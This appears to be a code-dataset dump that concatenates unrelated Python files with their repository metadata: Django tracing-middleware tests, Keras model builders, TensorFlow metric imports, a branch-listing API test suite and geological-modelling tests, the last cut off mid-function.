assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
found_mw = settings.MIDDLEWARE.count('oteltrace.contrib.django.TraceMiddleware')
assert found_mw == 1
found_mw = settings.MIDDLEWARE.count('oteltrace.contrib.django.TraceExceptionMiddleware')
assert found_mw == 1
class DjangoAutopatchCustomMiddlewareTest(DjangoTraceTestCase):
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_empty_middleware(self):
with self.settings(MIDDLEWARE=[]):
patch(django=True)
django.setup()
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
| 47.654867
| 105
| 0.713092
| 625
| 5,385
| 6.0432
| 0.1968
| 0.128674
| 0.145618
| 0.097961
| 0.796399
| 0.782632
| 0.779984
| 0.765687
| 0.759068
| 0.714324
| 0
| 0.018093
| 0.199443
| 5,385
| 112
| 106
| 48.080357
| 0.858038
| 0.18403
| 0
| 0.743243
| 0
| 0
| 0.287511
| 0.231016
| 0
| 0
| 0
| 0
| 0.405405
| 1
| 0.081081
| false
| 0
| 0.067568
| 0
| 0.175676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b78cde6d3cebe29f7e931577e725ff4b7c24b1cf
| 54
|
py
|
Python
|
app/src/main/python/myscript.py
|
dhivakar31/chaquopy3107
|
dc0748d3f3df1e1125788175a4a00c57eab85526
|
[
"MIT"
] | null | null | null |
app/src/main/python/myscript.py
|
dhivakar31/chaquopy3107
|
dc0748d3f3df1e1125788175a4a00c57eab85526
|
[
"MIT"
] | null | null | null |
app/src/main/python/myscript.py
|
dhivakar31/chaquopy3107
|
dc0748d3f3df1e1125788175a4a00c57eab85526
|
[
"MIT"
] | null | null | null |
def add(a,b):
return a+b
def sub(a,b):
return a-b
| 13.5
| 14
| 0.592593
| 14
| 54
| 2.285714
| 0.428571
| 0.25
| 0.5
| 0.5625
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 54
| 4
| 14
| 13.5
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b79db24da371797a985afbe7993ff2334ee38df9
| 271
|
py
|
Python
|
sources/controller/__init__.py
|
Groomsha/lan-map
|
1c30819470f43f8521e98eb75c70da23939f8f06
|
[
"Apache-2.0"
] | null | null | null |
sources/controller/__init__.py
|
Groomsha/lan-map
|
1c30819470f43f8521e98eb75c70da23939f8f06
|
[
"Apache-2.0"
] | null | null | null |
sources/controller/__init__.py
|
Groomsha/lan-map
|
1c30819470f43f8521e98eb75c70da23939f8f06
|
[
"Apache-2.0"
] | null | null | null |
from .main_window.main_window_controller import *
from .new_device_window.new_device_controller import *
from .new_device_window.save_data_new_device import *
from .new_device_window.button_new_device import *
from .new_device_window.widgets_control_new_device import *
| 38.714286
| 59
| 0.867159
| 41
| 271
| 5.219512
| 0.292683
| 0.336449
| 0.242991
| 0.35514
| 0.64486
| 0.64486
| 0.317757
| 0
| 0
| 0
| 0
| 0
| 0.077491
| 271
| 6
| 60
| 45.166667
| 0.856
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b7d07c5e4feef14cc5c5422522e05040db50289a
| 2,406
|
py
|
Python
|
AATCC/lab-report/w2/lc-7-test.py
|
kancheng/kan-cs-report-in-2022
|
2a1e1eaa515349d59803c7831a7bd4cbea890a44
|
[
"MIT"
] | null | null | null |
AATCC/lab-report/w2/lc-7-test.py
|
kancheng/kan-cs-report-in-2022
|
2a1e1eaa515349d59803c7831a7bd4cbea890a44
|
[
"MIT"
] | null | null | null |
AATCC/lab-report/w2/lc-7-test.py
|
kancheng/kan-cs-report-in-2022
|
2a1e1eaa515349d59803c7831a7bd4cbea890a44
|
[
"MIT"
] | null | null | null |
import time
# 計算通過 EX 1 的效率
start = time.process_time()
class Solution1:
def reverse(self, x: int) -> int:
max_32 = 2 ** 31 - 1
if abs(x) > max_32:
return 0
if x < 0:
rint = -int(str(abs(x))[::-1])
else:
rint = int(str(x)[::-1])
if abs(rint) > max_32:
return 0
else:
return rint
x1 = -123
x2 = 123
x3 = 120
ob1 = Solution1()
print(ob1.reverse(x1))
print(ob1.reverse(x2))
print(ob1.reverse(x3))
end = time.process_time()
print("Process Time: time of EX 1 is %.5f" % float(end-start))
start = time.perf_counter()
class Solution1:
def reverse(self, x: int) -> int:
max_32 = 2 ** 31 - 1
if abs(x) > max_32:
return 0
if x < 0:
rint = -int(str(abs(x))[::-1])
else:
rint = int(str(x)[::-1])
if abs(rint) > max_32:
return 0
else:
return rint
x1 = -123
x2 = 123
x3 = 120
ob1 = Solution1()
print(ob1.reverse(x1))
print(ob1.reverse(x2))
print(ob1.reverse(x3))
end = time.perf_counter()
print("Perf Counter: time of EX 1 is %.5f" % float(end-start))
# 計算通過 EX 2 的效率
start = time.process_time()
class Solution2:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
if x==0:
return 0
str_x = str(x)
x = ''
if str_x[0] == '-':
x += '-'
x += str_x[len(str_x)-1::-1].lstrip("0").rstrip("-")
x = int(x)
if -2**31<x<2**31-1:
return x
return 0
x1 = -123
x2 = 123
x3 = 120
ob2 = Solution2()
print(ob2.reverse(x1))
print(ob2.reverse(x2))
print(ob2.reverse(x3))
end = time.process_time()
print("Process Time: time of EX 2 is %.5f" % float(end-start))
start = time.perf_counter()
class Solution2:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
if x==0:
return 0
str_x = str(x)
x = ''
if str_x[0] == '-':
x += '-'
x += str_x[len(str_x)-1::-1].lstrip("0").rstrip("-")
x = int(x)
if -2**31<x<2**31-1:
return x
return 0
x1 = -123
x2 = 123
x3 = 120
ob2 = Solution2()
print(ob2.reverse(x1))
print(ob2.reverse(x2))
print(ob2.reverse(x3))
end = time.perf_counter()
print("Perf Counter: time of EX 2 is %.5f" % float(end-start))
| 22.698113
| 62
| 0.501247
| 362
| 2,406
| 3.270718
| 0.129834
| 0.040541
| 0.076014
| 0.050676
| 0.97973
| 0.97973
| 0.940878
| 0.940878
| 0.940878
| 0.908784
| 0
| 0.094645
| 0.332502
| 2,406
| 106
| 63
| 22.698113
| 0.64259
| 0.032419
| 0
| 0.946237
| 0
| 0
| 0.063576
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043011
| false
| 0
| 0.010753
| 0
| 0.225806
| 0.172043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d69ba1aa8e32ef8eb741e0c316674aff19ad67f
| 13,020
|
py
|
Python
|
Code/model_selection.py
|
MartinSchiemer/Revisiting_the_Information_Plane
|
0376d4a30d3753698f5985d657c92c3395def3ac
|
[
"MIT"
] | 1
|
2021-07-19T02:07:01.000Z
|
2021-07-19T02:07:01.000Z
|
Code/model_selection.py
|
MartinSchiemer/Revisiting_the_Information_Plane
|
0376d4a30d3753698f5985d657c92c3395def3ac
|
[
"MIT"
] | null | null | null |
Code/model_selection.py
|
MartinSchiemer/Revisiting_the_Information_Plane
|
0376d4a30d3753698f5985d657c92c3395def3ac
|
[
"MIT"
] | null | null | null |
"""
Author: Martin Schiemer
some sample model configurations
"""
import numpy as np
np.random.seed(1337)
# tensorflow properties
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Input, InputLayer, Dense, Activation, LeakyReLU, Flatten, Conv2D, MaxPooling2D
from tensorflow.keras.utils import normalize
from tensorflow.keras import optimizers
from tensorflow.keras.models import Model
def select_model(index, nr_of_epochs, set_name, x_train_shape, y_train):
"""
creates model and a network name acording to the dataset
index: flag that decides which model is taken
nr_of_epochs: how many epoch are max
set_name: name of the dataset
x_train_shape: shape of the input data
y_train: shape of the output data
returns: model and architecture name
"""
x_shape_length = len(x_train_shape)
if len(y_train.shape) > 1:
y_shape_length = y_train.shape[1]
else:
y_shape_length = 1
amount_of_classes = len(np.unique(y_train))
print("amount of classes", amount_of_classes)
print("Input shape: ", x_train_shape, " length: ", x_shape_length)
# define model
# mix network with leading TanH
if index == 1:
architecture = set_name + str(nr_of_epochs) + "D10T_D7T_D5R_D4R_D3R_D1S"
model = Sequential()
# inputlayers are needed to allow backend calculations
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(10))
model.add(Activation("tanh"))
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(4))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# mix network with leading ReLU
if index == 2:
architecture = set_name + str(nr_of_epochs) + "D10R_D7R_D5T_D4T_D3T_D1S"
model = Sequential()
#model.add(InputLayer((x_train_shape,)))
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(Activation("relu"))
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(4))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# ReLU network
if index == 3:
architecture = set_name + str(nr_of_epochs) + "D10R_D7R_D5R_D4R_D3R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(10))
model.add(Activation("relu"))
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(4))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# TanH network
if index == 4:
architecture = set_name + str(nr_of_epochs) + "D10T_D7T_D5T_D4T_D3T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(Activation("tanh"))
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(4))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# convolutional network with ReLU
if index == 5:
architecture = set_name + str(nr_of_epochs) + "COV32R_COV64R_D10R_D5R_D" + str(amount_of_classes) + "Soft"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1])))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1],
x_train_shape[2], x_train_shape[3])))
model.add(Conv2D(16, kernel_size=(3,3), strides=(1,1),input_shape=(x_train_shape[0],
x_train_shape[1],
x_train_shape[2])))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1,1)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# convolutional network with TanH
if index == 6:
architecture = set_name + str(nr_of_epochs) + "COV32T_COV64T_D10T_D5T_D" + str(amount_of_classes) +"Soft"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1])))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1],
x_train_shape[2], x_train_shape[3])))
model.add(Conv2D(16, kernel_size=(3,3), strides=(1,1),
input_shape=(x_train_shape[0],x_train_shape[1],x_train_shape[2])))
model.add(Activation("tanh"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1,1)))
model.add(Activation("tanh"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# Same layer size network ReLU
if index == 7:
architecture = set_name + str(nr_of_epochs) + "D5R_D5R_D5R_D5R_D5R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# Same layer size network TanH
if index == 8:
architecture = set_name + str(nr_of_epochs) + "D5T_D5T_D5T_D5T_D5T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# bottleneck network with TanH
if index == 9:
architecture = set_name + str(nr_of_epochs) + "D12T_D3T_D2T_D12T_D2T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(12))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Dense(2))
model.add(Activation("tanh"))
model.add(Dense(12))
model.add(Activation("tanh"))
model.add(Dense(2))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# bottleneck network with ReLU
if index == 10:
architecture = set_name + str(nr_of_epochs) + "D12R_D3R_D2R_D12R_D2R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(12))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Dense(2))
model.add(Activation("relu"))
model.add(Dense(12))
model.add(Activation("relu"))
model.add(Dense(2))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# leaky ReLU network
if index == 11:
architecture = set_name + str(nr_of_epochs) + "D10LR_D7LR_D5LR_D4LR_D3LR_D1S"
model = Sequential()
#model.add(InputLayer((x_train_shape,)))
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(7))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(5))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(4))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(3))
model.add(LeakyReLU(alpha=0.1))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
return model, architecture
| 32.962025
| 114
| 0.572197
| 1,663
| 13,020
| 4.258569
| 0.086591
| 0.206721
| 0.121152
| 0.0939
| 0.837758
| 0.819825
| 0.811635
| 0.780006
| 0.776617
| 0.734821
| 0
| 0.034411
| 0.2947
| 13,020
| 395
| 115
| 32.962025
| 0.736796
| 0.061137
| 0
| 0.835714
| 0
| 0
| 0.048097
| 0.022116
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003571
| false
| 0
| 0.028571
| 0
| 0.035714
| 0.007143
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d7df921ec137def1ddd43689a42e20db0ff3bf9
| 2,153
|
py
|
Python
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 3
|
2019-04-01T11:03:04.000Z
|
2019-12-31T02:17:15.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-04-15T18:46:45.000Z
|
2021-04-15T18:46:45.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-09-23T13:43:07.000Z
|
2021-09-23T13:43:07.000Z
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.ops.metrics import accuracy
from tensorflow.python.ops.metrics import auc
from tensorflow.python.ops.metrics import average_precision_at_k
from tensorflow.python.ops.metrics import false_negatives
from tensorflow.python.ops.metrics import false_negatives_at_thresholds
from tensorflow.python.ops.metrics import false_positives
from tensorflow.python.ops.metrics import false_positives_at_thresholds
from tensorflow.python.ops.metrics import mean
from tensorflow.python.ops.metrics import mean_absolute_error
from tensorflow.python.ops.metrics import mean_cosine_distance
from tensorflow.python.ops.metrics import mean_iou
from tensorflow.python.ops.metrics import mean_per_class_accuracy
from tensorflow.python.ops.metrics import mean_relative_error
from tensorflow.python.ops.metrics import mean_squared_error
from tensorflow.python.ops.metrics import mean_tensor
from tensorflow.python.ops.metrics import percentage_below
from tensorflow.python.ops.metrics import precision
from tensorflow.python.ops.metrics import precision_at_k
from tensorflow.python.ops.metrics import precision_at_thresholds
from tensorflow.python.ops.metrics import precision_at_top_k
from tensorflow.python.ops.metrics import recall
from tensorflow.python.ops.metrics import recall_at_k
from tensorflow.python.ops.metrics import recall_at_thresholds
from tensorflow.python.ops.metrics import recall_at_top_k
from tensorflow.python.ops.metrics import root_mean_squared_error
from tensorflow.python.ops.metrics import sensitivity_at_specificity
from tensorflow.python.ops.metrics import sparse_average_precision_at_k
from tensorflow.python.ops.metrics import sparse_precision_at_k
from tensorflow.python.ops.metrics import specificity_at_sensitivity
from tensorflow.python.ops.metrics import true_negatives
from tensorflow.python.ops.metrics import true_negatives_at_thresholds
from tensorflow.python.ops.metrics import true_positives
from tensorflow.python.ops.metrics import true_positives_at_thresholds
| 56.657895
| 73
| 0.87738
| 315
| 2,153
| 5.796825
| 0.168254
| 0.253012
| 0.361446
| 0.415663
| 0.866375
| 0.866375
| 0.807229
| 0.638007
| 0.278204
| 0.060241
| 0
| 0
| 0.069206
| 2,153
| 38
| 74
| 56.657895
| 0.911178
| 0.066419
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
4d80a70f3e54efcb2f91c7944b437bf6ede5f182
| 4,230
|
py
|
Python
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 443
|
2015-01-03T16:28:39.000Z
|
2021-04-26T16:39:46.000Z
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 12
|
2015-07-30T19:07:16.000Z
|
2016-11-07T23:11:21.000Z
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 47
|
2015-01-09T10:04:00.000Z
|
2020-11-18T17:58:19.000Z
|
import urllib
from mock import patch
from changes.models.repository import RepositoryBackend
from changes.testutils import APITestCase
class RepositoryTreeListTest(APITestCase):
def test_no_vcs(self):
repo = self.create_repo(url='https://example.co.nonexistent/bar')
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 422, resp.data)
self.assertIn('backend', resp.data)
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_single_branch(self, known_branches_mock):
test_branch_name = 'some_branch_name'
known_branches_mock.return_value = [test_branch_name]
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
assert data[0]['name'] == test_branch_name
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_multiple_branches(self, known_branches_mock):
test_branches = ['first_branch', '2nd:Branch']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 2
self.assertIn(data[0]['name'], test_branches)
self.assertIn(data[1]['name'], test_branches)
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_tree_filter(self, known_branches_mock):
test_branches = ['master', 'MATCH_ME']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/?branch={1}'.format(
repo.id, 'match')
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
self.assertIn(data[0]['name'], 'MATCH_ME')
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_escaped_tree_filter(self, known_branches_mock):
test_branches = ['master', 'MATCH:/ME']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/?branch={1}'.format(
repo.id, urllib.quote('match:/', safe=''))
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
self.assertIn(data[0]['name'], 'MATCH:/ME')
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_caching(self, known_branches_mock):
test_branches = ['first_branch', '2nd:Branch']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
# Get first time to warm up cache
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
print(data)
assert len(data) == 2
# Get again to fetch from cache
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
print(data)
assert len(data) == 2
self.assertIn(data[0]['name'], test_branches)
self.assertIn(data[1]['name'], test_branches)
| 41.881188
| 73
| 0.642553
| 525
| 4,230
| 5.001905
| 0.150476
| 0.074257
| 0.064737
| 0.045316
| 0.855674
| 0.846154
| 0.833968
| 0.833968
| 0.833968
| 0.833968
| 0
| 0.0153
| 0.227423
| 4,230
| 100
| 74
| 42.3
| 0.78825
| 0.014421
| 0
| 0.716049
| 0
| 0
| 0.18771
| 0.102016
| 0
| 0
| 0
| 0
| 0.259259
| 1
| 0.074074
| false
| 0
| 0.049383
| 0
| 0.135802
| 0.024691
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d8895ed0b2967ed5e2a2b88a94af9e04dc3472d
| 3,341
|
py
|
Python
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 67
|
2020-06-25T06:50:58.000Z
|
2022-03-29T17:15:43.000Z
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 60
|
2020-06-28T22:58:21.000Z
|
2022-03-24T01:30:59.000Z
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 9
|
2020-06-25T13:07:39.000Z
|
2021-12-01T01:41:24.000Z
|
from LoopStructural import GeologicalModel
from LoopStructural.datasets import load_claudius
def test_create_model():
data, bb = load_claudius()
model = GeologicalModel(bb[0,:],bb[1,:])
def test_add_data():
data, bb = load_claudius()
model = GeologicalModel(bb[0,:],bb[1,:])
model.set_model_data(data)
def test_create_stratigraphy_FDI_cg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='cg',
damp=False)
def test_remove_constraints_PLI():
data, bb = load_claudius()
